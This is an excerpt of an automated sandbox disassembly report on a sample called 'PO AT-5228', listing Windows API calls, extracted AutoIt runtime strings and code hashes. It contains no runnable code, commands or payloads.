                                                                                        • API String ID:
                                                                                        • Opcode ID: 0fd3d0c89f51fb2222995899da7ccb705b36d9d7de2f8c857b58da29d6f029b7
                                                                                        • Instruction ID: 40ba239f6cb8f58776bee63a428b93b5439d343e38e7606e16e5006878c776e2
                                                                                        • Opcode Fuzzy Hash: 0fd3d0c89f51fb2222995899da7ccb705b36d9d7de2f8c857b58da29d6f029b7
                                                                                        • Instruction Fuzzy Hash: F0126A70A002099FDF14DFA5D981AAEF7F9FF58300F1085A9E816E7254EB3AAD11CB54
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Exception@8Throwstd::exception::exception
                                                                                        • String ID:
                                                                                        • API String ID: 3728558374-0
                                                                                        • Opcode ID: 6bc0ebd81621fb4d52c1b68e3ef522dcff5f3a97c1f3c42423631863e08358eb
                                                                                        • Instruction ID: 2f017be0d4d0fda315eb8b2f4a44602674761139a513ee6bd8ac6f5aba0642a8
                                                                                        • Opcode Fuzzy Hash: 6bc0ebd81621fb4d52c1b68e3ef522dcff5f3a97c1f3c42423631863e08358eb
                                                                                        • Instruction Fuzzy Hash: 21029070A00205DBCF04DF64D991AAEBBF5EF49300F14C4AAE80AEB355EB35DA55CB91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1694924142.000000000195D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0195D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_195d000_PO AT-5228.jbxd
                                                                                        APIs
                                                                                        • DeleteObject.GDI32(00000000), ref: 00BBA2FE
                                                                                        • DeleteObject.GDI32(00000000), ref: 00BBA310
                                                                                        • DestroyWindow.USER32 ref: 00BBA31E
                                                                                        • GetDesktopWindow.USER32 ref: 00BBA338
                                                                                        • GetWindowRect.USER32(00000000), ref: 00BBA33F
                                                                                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00BBA480
                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00BBA490
                                                                                        • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BBA4D8
                                                                                        • GetClientRect.USER32(00000000,?), ref: 00BBA4E4
                                                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00BBA51E
                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BBA540
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BBA553
                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BBA55E
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00BBA567
                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BBA576
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00BBA57F
                                                                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BBA586
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00BBA591
                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BBA5A3
                                                                                        • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00BED9BC,00000000), ref: 00BBA5B9
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00BBA5C9
                                                                                        • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00BBA5EF
                                                                                        • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00BBA60E
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BBA630
                                                                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BBA81D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                                                        • API String ID: 2211948467-2373415609
                                                                                        APIs
                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00BCD2DB
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00BCD30C
                                                                                        • GetSysColor.USER32(0000000F), ref: 00BCD318
                                                                                        • SetBkColor.GDI32(?,000000FF), ref: 00BCD332
                                                                                        • SelectObject.GDI32(?,00000000), ref: 00BCD341
                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00BCD36C
                                                                                        • GetSysColor.USER32(00000010), ref: 00BCD374
                                                                                        • CreateSolidBrush.GDI32(00000000), ref: 00BCD37B
                                                                                        • FrameRect.USER32(?,?,00000000), ref: 00BCD38A
                                                                                        • DeleteObject.GDI32(00000000), ref: 00BCD391
                                                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 00BCD3DC
                                                                                        • FillRect.USER32(?,?,00000000), ref: 00BCD40E
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00BCD439
                                                                                          • Part of subcall function 00BCD575: GetSysColor.USER32(00000012), ref: 00BCD5AE
                                                                                          • Part of subcall function 00BCD575: SetTextColor.GDI32(?,?), ref: 00BCD5B2
                                                                                          • Part of subcall function 00BCD575: GetSysColorBrush.USER32(0000000F), ref: 00BCD5C8
                                                                                          • Part of subcall function 00BCD575: GetSysColor.USER32(0000000F), ref: 00BCD5D3
                                                                                          • Part of subcall function 00BCD575: GetSysColor.USER32(00000011), ref: 00BCD5F0
                                                                                          • Part of subcall function 00BCD575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00BCD5FE
                                                                                          • Part of subcall function 00BCD575: SelectObject.GDI32(?,00000000), ref: 00BCD60F
                                                                                          • Part of subcall function 00BCD575: SetBkColor.GDI32(?,00000000), ref: 00BCD618
                                                                                          • Part of subcall function 00BCD575: SelectObject.GDI32(?,?), ref: 00BCD625
                                                                                          • Part of subcall function 00BCD575: InflateRect.USER32(?,000000FF,000000FF), ref: 00BCD644
                                                                                          • Part of subcall function 00BCD575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00BCD65B
                                                                                          • Part of subcall function 00BCD575: GetWindowLongW.USER32(00000000,000000F0), ref: 00BCD670
                                                                                          • Part of subcall function 00BCD575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00BCD698
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                        • String ID:
                                                                                        • API String ID: 3521893082-0
                                                                                        APIs
                                                                                        • DestroyWindow.USER32 ref: 00B7B98B
                                                                                        • DeleteObject.GDI32(00000000), ref: 00B7B9CD
                                                                                        • DeleteObject.GDI32(00000000), ref: 00B7B9D8
                                                                                        • DestroyIcon.USER32(00000000), ref: 00B7B9E3
                                                                                        • DestroyWindow.USER32(00000000), ref: 00B7B9EE
                                                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 00BDD2AA
                                                                                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00BDD2E3
                                                                                        • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 00BDD711
                                                                                          • Part of subcall function 00B7B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00B7B759,?,00000000,?,?,?,?,00B7B72B,00000000,?), ref: 00B7BA58
                                                                                        • SendMessageW.USER32 ref: 00BDD758
                                                                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00BDD76F
                                                                                        • ImageList_Destroy.COMCTL32(00000000), ref: 00BDD785
                                                                                        • ImageList_Destroy.COMCTL32(00000000), ref: 00BDD790
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                        • String ID: 0
                                                                                        • API String ID: 464785882-4108050209
                                                                                        • Opcode ID: 3fdf22ee2bc41cff5196d69c33c3191e24dca5282c489ae92b5f49db4707a8e6
                                                                                        • Instruction ID: cdfa524e7b20c88522b62313cfc93661767bbd96e333657b7c9a60bb75dccb30
                                                                                        • Opcode Fuzzy Hash: 3fdf22ee2bc41cff5196d69c33c3191e24dca5282c489ae92b5f49db4707a8e6
                                                                                        • Instruction Fuzzy Hash: 98128C30204241DFDB15CF24C884BA9BBE5FF55314F1485AAEAA9DB262DB31EC45CF91
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00BADBD6
                                                                                        • GetDriveTypeW.KERNEL32(?,00BFDC54,?,\\.\,00BFDC00), ref: 00BADCC3
                                                                                        • SetErrorMode.KERNEL32(00000000,00BFDC54,?,\\.\,00BFDC00), ref: 00BADE29
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$DriveType
                                                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                        • API String ID: 2907320926-4222207086
                                                                                        • Opcode ID: ddd1541ea69dcd4d2f0e01807b0430f7f690d11155c58b60ed2d3da9fea4f695
                                                                                        • Instruction ID: 547b1355f25153ad0e1d955f8dbb475857118f6e88cc936417ebbfcccb8e1a57
                                                                                        • Opcode Fuzzy Hash: ddd1541ea69dcd4d2f0e01807b0430f7f690d11155c58b60ed2d3da9fea4f695
                                                                                        • Instruction Fuzzy Hash: 2E51B73024C341EBC710DF14C8D1969B7E1FB5B708B1449BAF4979B691EB70DA89E742
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: __wcsnicmp
                                                                                        • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                        • API String ID: 1038674560-86951937
                                                                                        • Opcode ID: ac760b1c4f9686cc52fd7098e48199267657328222042acda0d863473f1d534f
                                                                                        • Instruction ID: 44bd64fa77fa4330d0bc6f288500ea474370f8087828e3b949c61e0279a73108
                                                                                        • Opcode Fuzzy Hash: ac760b1c4f9686cc52fd7098e48199267657328222042acda0d863473f1d534f
                                                                                        • Instruction Fuzzy Hash: 5C81F531640209ABCB10AF64CC83FBE7BE9EF24300F0444F9F949AB292FB65D945C691
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(?,?,00BFDC00), ref: 00BC6449
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharUpper
                                                                                        • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                        • API String ID: 3964851224-45149045
                                                                                        • Opcode ID: 1dccc7e5985d5bd6c376ecf91a74fc01a62ad120f0b8059a47db5a1212309e17
                                                                                        • Instruction ID: b50e6115fdb15bcbdb5d7dc3b32dae2c3e66e473508eaacb91c785e01b3d91bf
                                                                                        • Opcode Fuzzy Hash: 1dccc7e5985d5bd6c376ecf91a74fc01a62ad120f0b8059a47db5a1212309e17
                                                                                        • Instruction Fuzzy Hash: 5BC153742042458BCE05EF14C591EAE77D9EF95344F1488EDF89A9B3D2DB20ED4ACB82
                                                                                        APIs
                                                                                        • GetSysColor.USER32(00000012), ref: 00BCD5AE
                                                                                        • SetTextColor.GDI32(?,?), ref: 00BCD5B2
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00BCD5C8
                                                                                        • GetSysColor.USER32(0000000F), ref: 00BCD5D3
                                                                                        • CreateSolidBrush.GDI32(?), ref: 00BCD5D8
                                                                                        • GetSysColor.USER32(00000011), ref: 00BCD5F0
                                                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00BCD5FE
                                                                                        • SelectObject.GDI32(?,00000000), ref: 00BCD60F
                                                                                        • SetBkColor.GDI32(?,00000000), ref: 00BCD618
                                                                                        • SelectObject.GDI32(?,?), ref: 00BCD625
                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00BCD644
                                                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00BCD65B
                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00BCD670
                                                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00BCD698
                                                                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00BCD6BF
                                                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 00BCD6DD
                                                                                        • DrawFocusRect.USER32(?,?), ref: 00BCD6E8
                                                                                        • GetSysColor.USER32(00000011), ref: 00BCD6F6
                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00BCD6FE
                                                                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00BCD712
                                                                                        • SelectObject.GDI32(?,00BCD2A5), ref: 00BCD729
                                                                                        • DeleteObject.GDI32(?), ref: 00BCD734
                                                                                        • SelectObject.GDI32(?,?), ref: 00BCD73A
                                                                                        • DeleteObject.GDI32(?), ref: 00BCD73F
                                                                                        • SetTextColor.GDI32(?,?), ref: 00BCD745
                                                                                        • SetBkColor.GDI32(?,?), ref: 00BCD74F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                        • String ID:
                                                                                        • API String ID: 1996641542-0
                                                                                        • Opcode ID: abb6aa805ba3f408cf89869640994f73bfab1dd1d6b7a0194bd0219860cba227
                                                                                        • Instruction ID: e399a403c3bca4bbb702253f2789f21f57bd708a7d73dc8f4f745dc8e0598358
                                                                                        • Opcode Fuzzy Hash: abb6aa805ba3f408cf89869640994f73bfab1dd1d6b7a0194bd0219860cba227
                                                                                        • Instruction Fuzzy Hash: 64514F75900248BFDF109FA4DC88EAE7BB9FF08324F114565F915AB2A1DBB59A40CF50
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00BCB7B0
                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00BCB7C1
                                                                                        • CharNextW.USER32(0000014E), ref: 00BCB7F0
                                                                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00BCB831
                                                                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00BCB847
                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00BCB858
                                                                                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00BCB875
                                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00BCB8C7
                                                                                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00BCB8DD
                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00BCB90E
                                                                                        • _memset.LIBCMT ref: 00BCB933
                                                                                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00BCB97C
                                                                                        • _memset.LIBCMT ref: 00BCB9DB
                                                                                        • SendMessageW.USER32 ref: 00BCBA05
                                                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 00BCBA5D
                                                                                        • SendMessageW.USER32(?,0000133D,?,?), ref: 00BCBB0A
                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00BCBB2C
                                                                                        • GetMenuItemInfoW.USER32(?), ref: 00BCBB76
                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00BCBBA3
                                                                                        • DrawMenuBar.USER32(?), ref: 00BCBBB2
                                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00BCBBDA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                        • String ID: 0
                                                                                        • API String ID: 1073566785-4108050209
                                                                                        • Opcode ID: 5af0d1ab1b5b3c55191ad069d8c7801551eab3c77aa23fd9fb07a93f21a066cd
                                                                                        • Instruction ID: a505516cb771a5149b7b7e41fe48e934aa5fb597a200752351e39abbcac2bd32
                                                                                        • Opcode Fuzzy Hash: 5af0d1ab1b5b3c55191ad069d8c7801551eab3c77aa23fd9fb07a93f21a066cd
                                                                                        • Instruction Fuzzy Hash: 30E15E75900258AFDF209FA5CC86FEE7BB8EF05714F14819AF919AB190DB708A41DF60
                                                                                        APIs
                                                                                        • GetCursorPos.USER32(?), ref: 00BC778A
                                                                                        • GetDesktopWindow.USER32 ref: 00BC779F
                                                                                        • GetWindowRect.USER32(00000000), ref: 00BC77A6
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00BC7808
                                                                                        • DestroyWindow.USER32(?), ref: 00BC7834
                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00BC785D
                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BC787B
                                                                                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00BC78A1
                                                                                        • SendMessageW.USER32(?,00000421,?,?), ref: 00BC78B6
                                                                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00BC78C9
                                                                                        • IsWindowVisible.USER32(?), ref: 00BC78E9
                                                                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00BC7904
                                                                                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00BC7918
                                                                                        • GetWindowRect.USER32(?,?), ref: 00BC7930
                                                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00BC7956
                                                                                        • GetMonitorInfoW.USER32 ref: 00BC7970
                                                                                        • CopyRect.USER32(?,?), ref: 00BC7987
                                                                                        • SendMessageW.USER32(?,00000412,00000000), ref: 00BC79F2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                        • String ID: ($0$tooltips_class32
                                                                                        • API String ID: 698492251-4156429822
                                                                                        • Opcode ID: 6702cecd7c2cdee97959c83c9bbba0c1b275f9130222b4fb85127bf77c54f8e1
                                                                                        • Instruction ID: 19542ba2d65544b9171c72cbf0d6a430a044c748471c06c8b27b8989fb83471a
                                                                                        • Opcode Fuzzy Hash: 6702cecd7c2cdee97959c83c9bbba0c1b275f9130222b4fb85127bf77c54f8e1
                                                                                        • Instruction Fuzzy Hash: 6AB15771608340AFDB04DF65C989F6ABBE5FF88310F00895DF5999B291DBB4E804CB92
                                                                                        APIs
                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00B7A939
                                                                                        • GetSystemMetrics.USER32(00000007), ref: 00B7A941
                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00B7A96C
                                                                                        • GetSystemMetrics.USER32(00000008), ref: 00B7A974
                                                                                        • GetSystemMetrics.USER32(00000004), ref: 00B7A999
                                                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00B7A9B6
                                                                                        • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 00B7A9C6
                                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00B7A9F9
                                                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00B7AA0D
                                                                                        • GetClientRect.USER32(00000000,000000FF), ref: 00B7AA2B
                                                                                        • GetStockObject.GDI32(00000011), ref: 00B7AA47
                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00B7AA52
                                                                                          • Part of subcall function 00B7B63C: GetCursorPos.USER32(000000FF), ref: 00B7B64F
                                                                                          • Part of subcall function 00B7B63C: ScreenToClient.USER32(00000000,000000FF), ref: 00B7B66C
                                                                                          • Part of subcall function 00B7B63C: GetAsyncKeyState.USER32(00000001), ref: 00B7B691
                                                                                          • Part of subcall function 00B7B63C: GetAsyncKeyState.USER32(00000002), ref: 00B7B69F
                                                                                        • SetTimer.USER32(00000000,00000000,00000028,00B7AB87), ref: 00B7AA79
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
